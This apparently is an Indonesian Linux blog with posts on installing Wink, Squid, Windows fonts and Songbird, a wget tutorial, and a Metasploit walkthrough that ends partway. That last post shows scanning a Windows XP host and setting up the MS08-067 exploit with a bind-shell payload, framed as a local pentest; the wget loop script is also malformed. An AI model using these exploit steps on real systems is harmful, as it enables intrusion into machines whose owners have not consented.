Jumat, 21 Januari 2011

Wink, Aplikasi Desktop Capturing on Slackware 13.1

Pernah buat tutorial atau presentasi? Yang berupa file video yang mengajarkan dengan langsung menunjukkan langkah perlangkah atau proses yang kita kerjakan di desktop komputer kita?

Ada aplikasi yang bernama Wink. Gunanya ya untuk itu tadi, Wink bisa merekam aktivitas yang kita kerjakan di desktop kita dan bisa digunakan untuk membuat tutorial ataupun presentasi. Selain gambar/video, Wink juga bisa merekam suara. Jadi kita bisa membuat tutorial berbentuk video dan juga ada suaranya. Wink mendukung format flash, exe, pdf, dan html untuk tutorial yang ingin kita buat.

Gmana berminat yah, trus bgmana dengan pengguna linux, terutama linux slackware yang katanya gak bisa pasang aplikasi ini itu... ckckckc salah besar cing.. Aplikasi wink jg punya versi 1.5 yang bisa jalan di linux. Skarang saya akan sharing pengalaman saya mulai saat download samapai ke tahap penginstalan

1. Download aja langsung paketnya di sini

2. Buat Directory wink di /home/ dan pindahkan hasil download Anda di directory wink
$ mkdir /home/wink
$ mv wink15.tar.gz /home/wink
$ cd /home/wink

3. Extract file wink15.tar.gz
$ tar -zxvf wink15.tar.gz
installdata.tar.gz
installer.sh

4. Maka ada 2 File hisil Extract tadi, saatnya penginstalan bro..
$ ./installer.sh
Please specify where you want to install Wink [/home/slacky/wink]: /home/slacky/wink
catatan : isikan "slacky" itu sesuai dengan users anda lalu tekan enter, kalau sudah munucul Successfully installed Wink artinya penginstalan selesai dan saatnya menjalankannya.

5. Untuk menjalankan wink, silahkan masuk ke directory temap Anda menginstall tadi
$ cd /home/slacky/wink
$ ./wink

6. Tampilan screenshoot


Read more ...

Kamis, 20 Januari 2011

squid-3.1.10 on slackware 13.1

Bismillahirrahmanirrahim...
Berikut ini saya akan membagi pengalaman saya dalam penginstalan squid-3.1.10 di slackware 13.1. squid-3.1.10 bisa Anda download langsung di sini :)

Berikut ini adalah tahap-tahap pemasangan squid :

1. Extract Packet squid dan masuk ke dalam folder hasil Extractnya
# tar -zxvf squid-3.1.10-20110119.tar.gz
# cd squid-3.1.10-20110119

2. Saatnya mengcompile paket squid
# ./configure --prefix=/usr/local/squid --enable-removal-policies=heap --enable-linux-netfilter --enable-delay-pools
# make all
# make install

3. Membuat user dan group khusus buat squid
# groupadd proxy
# userad proxy -g proxy -d /usr/local/squid -s /usr/bin/nologin


4. Menguabah owner cache
# chown -R proxy.proxy /usr/local/squid/var/cache

5.Konfigurasi squid.conf
# vi /usr/local/squid/etc/squid.conf

Ini ada contoh squid.conf yang saya punya, Anda tinggal sesuaikan dengan kebutuhan Anda

http_port 3128 transparent
prefer_direct off

cache_mem 8 MB
cache_swap_low 98 #95
cache_swap_high 99 #97
max_filedesc 8192

maximum_object_size 128 MB
minimum_object_size 0 bytes
maximum_object_size_in_memory 32 KB
ipcache_size 16384 #4096
ipcache_low 98 #95
ipcache_high 99 #97
fqdncache_size 16384 #4096
cache_replacement_policy heap LFUDA
memory_replacement_policy heap GDSF

cache_dir ufs /usr/local/squid/var/cache 100 16 256

cache_access_log /usr/local/squid/var/logs/access.log
cache_log /usr/local/squid/var/logs/cache.log
cache_store_log none

dns_nameservers 10.1.1.254

emulate_httpd_log off
hosts_file /etc/hosts
acl apache rep_header Server ^Apache

redirector_bypass on

refresh_pattern ^ftp: 10080 95% 241920
refresh_pattern . 180 95% 120960

quick_abort_min 0
quick_abort_max 0
quick_abort_pct 98

acl manager proto cache_object
acl localhost src 127.0.0.1/32

acl SSL_ports port 443 563 # https, snews
acl SSL_ports port 873 # rsync
acl Safe_ports port 80 # http
acl Safe_ports port 21 # ftp
acl Safe_ports port 443 563 # https, snews
acl Safe_ports port 70 # gopher
acl Safe_ports port 210 # wais
acl Safe_ports port 1025-65535 # unregistered ports
acl Safe_ports port 280 # http-mgmt
acl Safe_ports port 488 # gss-http
acl Safe_ports port 591 # filemaker
acl Safe_ports port 777 # multiling http
acl Safe_ports port 631 # cups
acl Safe_ports port 873 # rsync
acl Safe_ports port 901 # SWAT

acl inputIP url_regex ^http://[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/$
acl inputIP url_regex ^http://[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$

acl ymregex url_regex yupdater.yim ymsgr myspaceim
acl ym dstdomain .messenger.yahoo.com .psq.yahoo.com
acl ym dstdomain .us.il.yimg.com .msg.yahoo.com .pager.yahoo.com
acl ym dstdomain .rareedge.com .ytunnelpro.com .chat.yahoo.com
acl ym dstdomain .voice.yahoo.com
acl ym dstdomain .skype.com .imvu.com
acl pointblank src 203.89.146.0/24

acl downloadlimit url_regex -i ftp .mp3 .rm .mpg .mpeg .avi .dat .rar .tar.gz .tar.bz2 .tgz .txz .flv .rpm .deb .001 .002 .003 .004 .005 .006
acl downloadlimit url_regex -i ftp .007 .008 .009 .010 .iso .nrg .mp4 .ogg .mkv
acl downloadlimit url_regex -i \.avi$ \.mpg$ \.mpeg$ \.rm$ \.iso$ \.wav$ \.mov$ \.dat$ \.mpe$ \.mid$
acl downloadlimit url_regex -i \.midi$ \.rmi$ \.wma$ \.wmv$ \.ogg$ \.ogm$ \.m1v$ \.mp2$ \.mpa$ \.wax$
acl downloadlimit url_regex -i \.m3u$ \.asx$ \.wpl$ \.wmx$ \.dvr-ms$ \.snd$ \.au$ \.aif$ \.asf$ \.m2v$
acl downloadlimit url_regex -i \.m2p$ \.ts$ \.tp$ \.trp$ \.div$ \.divx$ \.mod$ \.vob$ \.aob$ \.dts$
acl downloadlimit url_regex -i \.ac3$ \.cda$ \.vro$ \.deb$ \.mkv$ \.001$ \.002$ \.003$ \.004$ \.005$ \.006$ \.007$

acl domain_terlarang dstdomain "/usr/local/squid/etc/domain_terlarang.txt"
http_access deny domain_terlarang

# DOWNLOAD LIMITER
# ----------------

delay_pools 1
delay_class 1 2
delay_parameters 1 -1/-1 1000/16000
delay_access 1 allow downloadlimit
delay_access 1 deny ALL

http_access allow pointblank localhost
http_access deny pointblank

http_access deny ym
http_access deny ymregex

http_access allow manager localhost
http_access deny manager

acl LAN src 10.1.1.0/24
http_access allow LAN

cache_mgr upa-04.net
visible_hostname upa-04
cache_effective_user proxy
cache_effective_group proxy
coredump_dir /usr/local/squid/var/cache
pid_filename /usr/local/squid/var/run/squid.pid
shutdown_lifetime 10 seconds
logfile_rotate 1

log_fqdn off
memory_pools off
reload_into_ims on
pipeline_prefetch on
vary_ignore_expire on
client_db on

tcp_outgoing_tos 0x30 all

error_directory /usr/local/squid/share/errors/en/


6. Khusu untuk acl domain_terlarang diatas, buatkan file "domain_terlarang.txt" di /usr/local/squid/etc/domain_terlarang.txt, berikut contoh dan isinya
# vi /usr/local/squid/etc/domain_terlarang.txt
isikan dengan :
.facebook.com
.youtube.com
.yahoo.com

6. Tambahkan perintah iptables ini untuk mendukung squid Anda
# /usr/sbin/iptables -t nat -A PREROUTING -p tcp -s 10.1.1.0/24 --dport 80 -j REDIRECT --to-port 3128

7. Jalankan squid Anda
# /usr/local/squid/sbin/squid -z
# /usr/local/squid/sbin/squid start

8. Melihat access.log
# tail -f /usr/local/squid/var/logs/access.log

9. Selesai

Lebih dan kurangnya mohon di maafkan, saya masih membutuhkan saran dan kritik dari Anda demi kesempurnaan tulisan di atas... :)
Read more ...

Minggu, 31 Oktober 2010

Install Windows Font di SLACKWARE

Kalian terbiasa dengan widows font yah.. contohnya "Times New Roman" dkk... :)
Tenang bro.. siapa bilang SLACKWARE gak bisa. Yang perlu Anda lakukan cukup menyiapkan kumpulan font windows sebanyak mungkin. Oce... :)

1. Terlebih dahulu kumpulkan font-font Anda di satu direktori (misal=font_win) di home

2. Setelah itu buat direktori "msfont" di /usr/share/fonts/TTF/ untuk lebih jelasnya yang mana font baru yang Anda tambahkan.
  • root@ilho:/# cd /usr/share/fonts/TTF
  • root@ilho:/# mkdir msfont
3. Copy semua font windows Anda di folder msfont tadi
  • root@ilho:/# cp /home/font_win/*.ttf /home/font_win/*.TTF /usr/share/fonts/TTF/msfont/
  • root@ilho:/# chmod 664 /usr/share/fonts/TTF/msfont/*.*
4. Setelah itu tambahkan Path direktori /usr/share/fonts/TTF/msfont/ ke dalam /etc/X11/config dengan cara :
  • root@ilho:/# vi /etc/X11/fs/config
  • diawali dengan koma (,) /usr/share/fonts/TTF/msfont/
  • simpan dengan :wq
Nah,.. Sekarang silahkan Anda membuka openoffice word Anda dan lihat perubahannya.. :).. skarang Anda sudah bisa menggunakan font Times New Roman.. :)
Read more ...

Songbird on Slackware

Pengen dengar musik sambil baca lirik lagu kesayangan Anda.. saatnya Anda install "SONGBIRD" di Slackware kesayangan Anda.

Nah.. klo kalian bingung dapatkan paket dan cara installnya, disini saya akan menuntun Anda bagaimana cara mendapatkan paket dan menuntun Anda bagaimana cara installnya. Skarang yang Anda lakukan cuman menyiapkan segelas kopi hangat dan duduk manis membaca potingan sy ini :).... gmana..? udah siap.. MULAI...!!! hehehe...

1. Silahkan download paket slackbuildnya terlebih dahulu di sini
2. Gmana, udah... ??? lo udah, silahkan extrac file tersebut
  • # tar -zxvf Songbird.tar.gz
  • # cd Songbird
3. Nah skarang kt Download paketnya dengan menggunakan perintah wget.. :)
  • # wget http://download.songbirdnest.com/installer/linux/i686/Songbird_1.4.3-1438_linux-i686.tar.gz
  • # chmod +x Songbird.Slackbuild
  • # ./Songbird.Slackbuild
4. Maka otomatis Songbird akan membuat paket .tgz di folder /tmp. kita tinggal menginstallnya bro..
  • # installpkg /tmp/Songbird-1.4.3_1438-i686-1_SBo.tgz
5. Selesai.... SELAMAT Ber songbird ria... :)
Read more ...

Rabu, 01 September 2010

Wget, The best downloader

Wget merupakan salah satu tool download command line yang paling terkenal, agar Anda bisa mendownload apa saja yang Anda suka, hanya yang Anda suka, dan kapan saja Anda suka. Berhati-hatilah jika menggunakan wget di tempat dengan koneksi Internet yang cepat, sebab kesalahan memakai opsi wget bisa berakibat Anda mendownload banyak halaman tanpa henti hingga beratus-ratus mega atau bergiga-giga. Juga sebaiknya tidak melakukan download masal secara berlebihan pada satu situs, sebab mungkin situs tersebut jadi overload dan terganggu aktivitasnya.

Tentu saja ada banyak tool download lain, baik berbasis grafis maupun command line. Tapi saya akan memfokuskan pada tool command line karena dua hal. Yang pertama, tool command line tersedia di server dan dapat diakses melalui telnet/SSH. Ini penting sekali agar Anda tidak harus selalu online selama download berlangsung. Juga akan meningkatkan efisiensi terutama jika mendownload ribuan file kecil-kecil, karena server umumnya memiliki latensi koneksi yang lebih rendah daripada koneksi dialup rumahan. Setelah semua file Anda download di server, Anda bisa mengemasnya dalam .zip atau .tar.gz dan baru mendownload satu file saja ke rumah. Ini mengirit waktu. Yang kedua, tool command line amat fleksibel, terutama jika dikombinasikan tool-tool command line lainnya. Akan saya demonstrasikan melalui beberapa contoh nanti.

Wget pertama kali ditulis tahun 1995 oleh Hrvoje Niksic dan dirilis di bawah lisensi GNU. Wget dikategorikan sebagai web client tool, WWW retrieval program, dan sering juga disebut web robot.

Installasi

# tar xfz wget-1.8.1.tar.gz
# cd wget-1.8.1
# ./configure --prefix=/usr
# make all install

Tambahkan opsi --with-ssl di baris configure jika Anda ingin dukungan SSL. Setelah semuanya selesai, Anda akan menjumpai wget baru di /usr/bin/wget yang siap melaksanakan kehendak dan titah Baginda

Contoh-contoh Penggunaan Wget

1. Mengambil sebuah URL dengan wget

Cukup sebutkan URL (atau URL-URL) sebagai argumen wget.

$ wget http://mwmag.com

--22:41:14-- http://mwmag.com/
`index.html'
Resolving mwmag.com... done.
Connecting to mwmag.com[202.95.131.154]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
5,219 4.98M/s
22:41:14 (4.98 MB/s) - `index.html' saved [5219]

Kita baru saja menyuruh wget untuk mengambil sebuah URL http://mwmag.com. Wget akan menyimpan ini di file index.html. Pertama-tama wget akan berusaha meresolve (mencari alamat IP) mwmag.com, melakukan koneksi ke server tersebut, lalu mengirim request HTTP untuk meminta URI / ke host mwmag.com.

Untuk mengambil beberapa file, sebutkan saja secara berurutan. http:// bersifat opsional dan boleh tidak kita sebutkan untuk mengirit ketikan.

$ wget mwmag.com/index01.html mwmag.com/index02.html

--22:48:12-- http://mwmag.com/index01.html
`index01.html'
Resolving mwmag.com... done.
Connecting to mwmag.com[202.95.131.154]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified
6,191 5.46K/s
22:48:14 (5.46 KB/s) - `index01.html' saved [6191]
http://mwmag.com/index02.html
`index02.html'
Connecting to mwmag.com[202.95.131.154]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
6,048 5.48K/s
22:48:16 (5.48 KB/s) - `index02.html' saved [6048]
FINISHED --22:48:16--

Downloaded: 12,239 bytes in 2 files

2. Fasilitas “resume”

opsi -c (continue)

$ wget -c ftp://ftp.linux.tucows.com/pub/ISO/RedHat/enigma-i386-disc1.iso

Tanpa opsi -c, jika koneksi putus maka wget akan berhenti, meninggalkan file yang baru setengah terdownload. Saat menjalankan wget lagi, Anda dapat menambahkan -c supaya wget berusaha meresume file setengah jadi itu. Agar praktis, saya biasa selalu menambahkan -c sebagai opsi standar agar resume selalu berusaha dilakukan.

Catatan: tentu saja tidak semua URL dapat diresume. Semua bergantung pada setting webserver. Konten dinamik hasil keluaran skrip misalnya, hampir selalu tidak dapat diresume. Ini berlaku juga bagi program-program download lainnya, jadi ini bukan sebuah keterbatasan wget.

Lawan dari -c adalah -nc (no-clobber). Jika download sebuah file terhenti di tengah, dan Anda menjalankan wget lagi dengan -nc, maka wget tidak akan mengutak-atik file yang baru setengah terdownload sebelumnya, melainkan akan menganggap file itu sudah diambil dan melanjutkan ke URL berikutnya (atau langsung selesai, jika tidak ada lagi URL yang harus didownload).

3. Fasilitas “retry”

Gunakan opsi -t (tries), diikuti sebuah angka.

Dengan opsi ini Anda dapat mengatur berapa kali wget sebaiknya melakukan retry jika koneksi putus di tengah-tengah. -t 2 berarti coba hanya dua kali. Sebutkan -t 0 untuk mencoba tanpa kunjung lelah (alias, sebanyak tak hingga kali). Umumnya memang -t 0 yang dipakai, karena toh kita tidak pernah tahu berapa kali koneksi akan putus di perjalanan. Mirip dengan fitur resume, retry ini hanya bisa dilakukan jika server yang kita mintai mendukungnya. Tepatnya, retry hanya mungkin jika server mengeluarkan header Content-Length, sehingga wget dapat tahu berapa ukuran asli file yang diminta (dan jadi tahu bahwa jika yang terdownload masih lebih kecil ukurannya, berarti memang belum selesai). File-file statik secara otomatis diberi Content-Length oleh IIS, Apache, atau webserver lainnya. Tapi konten dinamik (termasuk PHP/ASP/SSI misalnya) umumnya tidak memberikan Content-Length sehingga wget tidak dapat melakukan retry. Meskipun demikian, ada trik-trik untuk bisa tetap melakukan retry, yang akan ditunjukkan nanti.

Ada opsi lain yang berhubungan dengan retry, yaitu --waitretry, yaitu berapa lama jeda (dalam detik) wget harus menunggu sebelum melakukan koneksi ulang. Defaultnya adalah 0, yaitu langsung mencoba koneksi ulang. Jika server yang kita minta melakukan banning kepada peminta yang terlalu sering melakukan koneksi, maka kita bisa menunggu dulu beberapa saat sebelum retry.

Jadi, berikut perintah untuk melakukan retry terus sampai seluruh file terdownload, tapi menunggu 1 menit di setiap kali sebelum retry. Jangan lupa memberi -c, sebab jika tidak maka wget akan mendownload dari awal setiap kali retry (Meskipun memang, jika servernya tidak mendukung resume, maka dengan -c pun wget harus mendownload dari awal).

$ wget -c -t0 --waitretry 60

ftp://ftp.linux.tucows.com/pub/ISO/RedHat/enigma-i386-disc1.iso

Catatan: meskipun diset -t0, tapi wget akan langsung menyerah jika saat ingin retry ternyata server di ujung sana mati (Connection refused) atau ternyata filenya hilang atau berubah ukuran. Jika Anda yakin file itu masih ada di lokasi yang sama dan Anda ingin wget terus mencoba meskipun server sedang mati, maka bisa dipakai trik membungkus perintah wget dalam loop skrip sederhana. Wget akan mengembalikan status program 0 (sukses) jika file telah terdownload dengan sempurna, tapi 1 jika terputus. Karena itu . Berikut skrip shell Unix untuk melakukannya:

#!/bin/sh
# download terus cd red hat 7.2 sampe aku dapet!
# gak peduli putus berapa kali, gak peduli server di sana mati.

wget -c -t0 --waitretry 60
ftp://ftp.linux.tucows.com/pub/ISO/RedHat/enigma-i386-disc1.iso
sleep 60
done

4. Cara buat download dan supaya bisa ditinggal pergi

Gunakan opsi -b (background).

$ wget -c -t0 –b

http://research.google.com/contest/prog-contest-sample.tar
Continuing in background, pid 6294.
Output will be written to `wget-log'

Karena ada -b, maka wget tidak akan menampilkan progress ke layar, melainkan semuanya akan ditulis dalam file log yang bernama wget-log. Jika di direktori yang sama kebetulan sudah ada file wget-log, maka log akan ditulis ke wget-log.1, dst. Jika Anda intip file log ini, maka isinya sebetulnya sama dengan laporan wget di mode foreground. Jadi wget menulis laporannya ke file dan bukan ke layar.

Setelah memberikan perintah wget (dan juga sebaiknya setelah Anda intip dulu sejenak wget-log untuk memastikan download sudah mulai), Anda dapat langsung log out dan mengecek lagi beberapa jam kemudian, atau keesokan harinya.

Jika Anda mendownload tanpa -b, lalu di tengah jalan karena tidak sabar menunggu Anda memutuskan ingin meninggalkan saja wget ke mode background, maka lakukan hal berikut: tekan Ctrl-Z, lalu ketik kill -HUP %1. Sinyal HUP akan memberi isyarat pada wget agar lalu mengarahkan output laporan ke wget-log dan tidak ke layar lagi. Baru setelah itu download bisa Anda tinggal.

5. Mendownload seluruh isi sebuah situs.

Gunakan opsi -r (recursive).

Di sinilah saat manfaat tool noninteraktif seperti wget membantu kita. Jika kita ingin mendownload seluruh situs lewat browser misalnya, maka Anda mungkin harus melakukan ratusan kali klik dan pemilihan menu. Membosankan sekali. Dengan tool seperti wget, maka sebuah halaman HTML yang dibaca akan diparse dan dicari link-linknya, kemudian masing-masing link ini akan ditelusuri untuk memperoleh dokumen berikutnya, dst. Dengan kombinasi -b, Anda bisa meninggalkan download dan besok-besoknya, seluruh situs sudah termirror buat Anda!

-r menyatakan pada wget bahwa kita ingin menelusuri link. Berikut contoh yang saya buat dan terletak di mwmag.com:

$ wget -r mwmag.com/issue/04/content/hack-wget/file/sample01.html

Di file sample01.html terdapat beberapa link. Wget akan memparse halaman HTML tersebut dan mengambil link-linknya. Dia tidak akan mengikuti link ke situs lain (mis: www.cnn.com) melainkan hanya ke host yang sama (mwmag.com). Halaman yang sudah diambil (mis: sample02.html yang dilink dari sample01.html) akan juga bernasib sama: diparse link-linknya dan diikuti oleh wget. Demikian seterusnya hingga seluruh link yang ada habis terjelajahi. Jika terdapat sejumlah cukup link di awal penelusuran, seluruh objek di mwmag.com yang terjamah dan publik akan bisa terjaring dan terdownload.

File-file yang didownload secara otomatis akan disimpan dalam struktur direktori mengikuti struktur URL asli. Misalnya, http://mwmag.com/issue/04/content/ akan disimpan di file index.html yang berada di subdirektori mwmag.com/issue/04/. Pengaturan ini akan memudahkan dalam mirroring (dijelaskan nanti). Catatan: Jika Anda ingin URL disimpan dalam struktur seperti ini meskipun tanpa harus melakukan download rekursif, beri opsi -x (force directories). Contoh: wget -x mwmag.com/issue/04/.

Pada umumnya Anda jarang butuh harus mendownload seluruh isi situs. Kadang hanya ingin mengambil hingga kedalaman tertentu saja, kadang hanya jenis file tertentu saja, kadang hanya ingin mengambil satu cabang situs saja (mis: /archive/2001/), atau Anda hanya ingin mengambil satu halaman beserta objek-objeknya saja (imej, JS/CSS) tanpa benar-benar bermaksud mendownload rekursif.

6. Mengambil situs satunet.com hingga tiga-empat level saja.

Gunakan -l (level).

Sebetulnya rekan kerja saya di satunet.com dulu benar-benar pernah minta ini. Dia anggota tim advertising yang ingin mendemonstrasikan portal Satunet ke calon pengiklan. Diinginkan agar situs satunet.com didownload ke laptop dan bisa dibrowse offline (“bisa diceklak-ceklik”). Tidak perlu seluruh isi situs (karena itu akan menghabiskan ruang disk ratusan MB), tapi cukup hingga tiga atau empat level saja agar jika kita mengklik sebuah halaman dari halaman depan, di halaman kedua itu kita masih bisa mengklik sesuatu, dan sekali lagi demikian.

Kita memberikan opsi -l untuk mengatur berapa level, atau kedalaman penelusuran. Jika tidak disebutkan (hanya -r), maka wget menganggap -l0, alias sampai kedalaman tak hingga (atau sampai semua link di situs ybs habis). Untuk memenuhi permintaan download empat level, kita berikan perintah ini:

$ wget -r -l4 -k http://satunet.com

Untuk apa -k (convert links)? Opsi ini penting jika kita ingin hasil download bisa dibrowse offline. -k akan mengkonversi link-link absolut (ke http://satunet.com/...) sehingga menjadi link relatif.

Tip: Anda juga bisa tambahkan -c dan -t untuk menambah reliabilitas, tapi waktu itu saya mendownload dari jaringan yang sama, jadi tidak ada masalah dengan kecepatan atau stabilitas koneksi.

Catatan: Grab rekursif memakai -r, -l0 (apalagi jika nanti Anda menggunakan -H) potensial berbahaya, karena Anda tidak pernah tahu berapa ukuran total sebuah situs. Jika di situs tersebut terdapat link yang dihasilkan secara dinamik (mis: /browseProduct.cgi?cat=foo yang lalu memuntahkan puluhan link lain), maka Anda bisa saja pada akhirnya menuai beratus-ratus halaman yang tidak diinginkan. Semakin cepat koneksi ke server, semakin berbahayalah, sebab Anda bisa membuat wget berkelana dan tersesat di rimba Web sambil mendownload segudang sampah.

7. Mengambil hanya halaman HTML dari tucows.mweb.co.id (dengan kata lain, ingin mengambil katalog HTML-nya).

Gunakan opsi -A (accept list), diikuti dengan daftar akhiran file yang diinginkan dan dipisahkan dengan koma.

$ wget -r -A htm,html -k tucows.mweb.co.id

8. Mengambil semua gambar yang ada di situs satulelaki.com.

Mungkin Anda berpikir menggunakan -A gif,jpg,jpeg. Tapi tunggu dulu: tanpa mengambil halaman HTML-nya juga, bagaimana Anda bisa menelusuri halaman demi halaman untuk menemukan gambarnya?

$ wget –c –t0 -r -A htm,html,gif,jpg,jpeg –k satulelaki.com

9. Mengambil semua file yang ada di mwmag.com, tapi tidak ingin mengambil PDF-nya.

Gunakan opsi -R (reject list). Perhatikan, ini berbeda dengan -r (huruf kecil). -R adalah lawan dari -A, yaitu untuk mengambil semua file berakhiran apa saja, kecuali yang disebutkan di daftar hitam.

$ wget -r –k -R pdf mwmag.com

10. Mengambil halaman depan www.detik.com lengkap dengan gambar, iklan, dan semuanya.

Gunakan opsi -p (page requisites).

$ wget -p www.detik.com

11. Mengambil seluruh file di www.master.web.id/tutorial/ (tapi tidak ingin mengambil file di section yang lain).

Gunakan opsi -np (no parent) sebagai pembatas -r. Dengan cara ini, -r tidak akan menelusuri ke atas path.

$ wget -r –k –np –l0 www.master.web.id/tutorial/

12. Mngambil keseluruhan file HTML dan gambar di www.master.web.id/, tapi tidak ingin mengambil bagian forum, cgi-bin, download, dan daerah-daerah dinamik lainnya yang tidak diinginkan.

Gunakan opsi -X (exclude directories), diikuti daftar direktori yang tidak ingin diikutsertakan dan dipisahkan dengan koma. Bedakan ini dengan -R. -R membatasi jenis file, -X membatasi direktori.

$ wget –r –l0 –A htm,html,gif,jpg,jpeg www.master.web.id

13. Download yang sebelumnya sudah selesai, tapi saya lupa saya ingin mengambil juga file-file PNG, ZIP, FLA, dan SWF. Tapi saya tidak ingin mendownload semuanya dari awal.

Masih ingat opsi -nc? Kali ini berguna buat kita.

$ wget -r –l0 –nc –A htm,html,gif,jpg,jpeg,png,zip,fla,swf www.master.web.id

File-file yang sudah didownload tidak akan didownload lagi, tapi tetap diparse untuk mencari link.

Gunakan opsi -X (exclude directories), diikuti daftar direktori yang tidak ingin diikutsertakan dan dipisahkan dengan koma. Bedakan ini dengan -R. -R membatasi jenis file, sementara -X membatasi direktori.

Ada lagi opsi -I (include directories) yang merupakan kebalikan -X. Silakan dicoba sendiri efeknya.

Tambahan:
Mirroring

Keinginan: Saya sudah mendownload seluruh cabang situs steven.haryan.to/email/. Sekarang saya lihat beberapa dokumen ada yang diupdate. Saya ingin pula mengupdate kopi lokal saya, tapi malas jika harus mendownload ulang semuanya.

Jawab: gunakan opsi -m (mirror). Dengan menyebutkan -m saja, Anda telah menginstruksikan wget untuk melakukan -r -N -l0 -nr. Detail tiap opsi bisa Anda baca di manual wget, yang jelas, -m ini digunakan untuk melakukan mirroring sebuah situs dan untuk mengupdatenya manakala perlu.

$ wget -m -np steven.haryan.to/email/

Pertama kali Anda menjalankan ini hingga selesai, cabang /email di homepage saya telah Anda download. Jika Anda jalankan lagi untuk kedua kalinya, wget akan mengecek dan membandingkan usia tiap file yang telah didownload dengan yang di server. Jika tidak ada yang lebih baru dari server, maka tidak ada yang didownload ulang. Enak bukan?

Sumber : http://ajie.web.id/index.php?option=com_content&task=view&id=23&Itemid=28
Read more ...

Jumat, 27 Agustus 2010

Metasploit : Teknik Dasar

Posting ini kubuat sebagai salah satu contoh audit security halah.. pentest aja yah bahasanya di network lokal tempatku bekerja. Ndak pake kata-kata hacking lah.. Wong cuman manfaatin tools yang disebar di inet kok disebut hacking :p. Soalnya banyak kale yang test metasploit seperti ini dan dibilang hacking bla-bla-bla. :-p. Go to side corner lamerzz… Post ini juga buat bayar utang ma hardie soal metasploit :D Ini coy dah kutepatin janjinya. silahkan coba sendiri ya. cara yang paling mudah sebenarnya bisa menggunakan OS BackTrack, tapi disini saya menggunakan ubuntu yang telah diinstall metasploit. Langkah instalasinya bisa dilihat disini.

Metasploit : msfconsole
Lets go.. pertama kali kita coba dengan testing manual menggunakan metasploit console (msfconsole) yang mana test ini dilakukan pada single mesin windows xp sp2 dengan melakukan percoban exploit ms windows MS08-067 yaitu vulner pada microsoft windows di port 445 beberapa waktu yang lalu yang sempet bikin microsoft kelimpungan :D . Dari terminal console ketik perintah berikut, seperti pada gambar dibawah:

$ msfconsole


Untuk perintah-perintah lainnya bisa dipelajari dengan mengetikkan help :

    msf > help
    Core Commands
    =============

    Command Description
    ------- -----------
    ? Help menu
    back Move back from the current context
    banner Display an awesome metasploit banner
    cd Change the current working directory
    connect Communicate with a host
    exit Exit the console
    help Help menu
    info Displays information about one or more module
    irb Drop into irb scripting mode
    jobs Displays and manages jobs
    load Load a framework plugin
    loadpath Searches for and loads modules from a path
    quit Exit the console
    resource Run the commands stored in a file
    route Route traffic through a session
    save Saves the active datastores
    search Searches module names and descriptions
    sessions Dump session listings and display information about sessions
    set Sets a variable to a value
    setg Sets a global variable to a value
    show Displays modules of a given type, or all modules
    sleep Do nothing for the specified number of seconds
    unload Unload a framework plugin
    unset Unsets one or more variables
    unsetg Unsets one or more global variables
    use Selects a module by name
    version Show the framework and console library version numbers

Untuk melihat list exploits-nya , gunakan perintah :

    msf > show exploits

List seluruh exploit yang ada kira-kira seperti ini (saya paste sebagian saja biar ndak terlalu panjang) :

    windows/smb/ms05_039_pnp              Microsoft Plug and Play Service Overflow
    windows/smb/ms06_025_rasmans_reg Microsoft RRAS Service RASMAN Registry Overflow
    windows/smb/ms06_025_rras Microsoft RRAS Service Overflow
    windows/smb/ms06_040_netapi Microsoft Server Service NetpwPathCanonicalize Overflow
    windows/smb/ms06_066_nwapi Microsoft Services MS06-066 nwapi32.dll
    windows/smb/ms06_066_nwwks Microsoft Services MS06-066 nwwks.dll
    windows/smb/ms08_067_netapi Microsoft Server Service Relative Path Stack Corruption

Scan mesin target menggunakan nmap. Dalam contoh kasus kali ini kita gunakan kompi dg ip 192.168.1.28 :

    msf > sudo nmap -v -sS -A -O 192.168.1.28
    [*] exec: sudo nmap -v -sS -A -O 192.168.1.28
    [sudo] password for test:Starting Nmap 4.62 ( http://nmap.org ) at 2009-03-21 23:50 CIT
    Initiating ARP Ping Scan at 23:50
    Scanning 192.168.1.28 [1 port]
    Host 192.168.1.28 appears to be up ... good.
    Interesting ports on 192.168.1.28:
    Not shown: 1712 closed ports
    PORT STATE SERVICE VERSION
    135/tcp open msrpc Microsoft Windows RPC
    139/tcp open netbios-ssn
    445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
    MAC Address: 00:1E:8C:67:59:F9 (Asustek Computer)
    Device type: general purpose
    Running: Microsoft Windows XP
    OS details: Microsoft Windows 2000 SP4, or Windows XP SP2 or SP3
    Network Distance: 1 hop
    TCP Sequence Prediction: Difficulty=258 (Good luck!)
    IP ID Sequence Generation: Incremental
    Service Info: OS: Windows

Dari hasil scan kita ketahui bahwa kemungkinan OS-nya menggunakan OS Windows XP dengan port 445-nya terbuka. Mari kita coba kompi ini dengan menggunakan exploit windows/smb/ms08_067_netapi.

    msf > use windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi) >

Lihat opsi dari exploit ini dengan mengetikkan show options :

    msf exploit(ms08_067_netapi) > show options
    Module options:
    Name Current Setting Required Description
    ---- --------------- -------- -----------
    RHOST yes The target address
    RPORT 445 yes Set the SMB service port
    SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

    Exploit target:
    Id Name
    -- ----
    0 Automatic Targeting

Dari opsi diatas, maka kita perlu set terlebih dahulu RHOST ( komputer target) dengan mengetikkan :

    msf exploit(ms08_067_netapi) > set rhost 192.168.1.28
    rhost => 192.168.1.28

Untuk RPORT, kita tidak perlu melakukan setting apa-apa karena vulnerability ini memang mengeksploitasi vulnerability di port 445. Untuk exploit target diisi dengan OS komputer target. Dalam langkah ini kita menggunakan angka 0 yang berarti automatic target. Untuk melihat OS target apa saja, ketik :

    msf exploit(ms08_067_netapi) > show targets
    Exploit targets:
    Id Name
    -- ----
    0 Automatic Targeting
    1 Windows 2000 Universal
    2 Windows XP SP0/SP1 Universal
    3 Windows XP SP2 English (NX)
    4 Windows XP SP3 English (NX)
    -------- cut -----------

Sekarang kita tentukan jenis payload yang ingin dipakai. Dalam langkah ini saya ingin menggunakan tcp_bind shell (akses command prompt di kompi target) :

    msf exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp
    payloads => windows/shell_bind_tcp

Untuk melihat payload apa saja dalam metasploit, gunakan perintah :

    msf exploit(ms08_067_netapi) > show payloads
    Compatible payloads
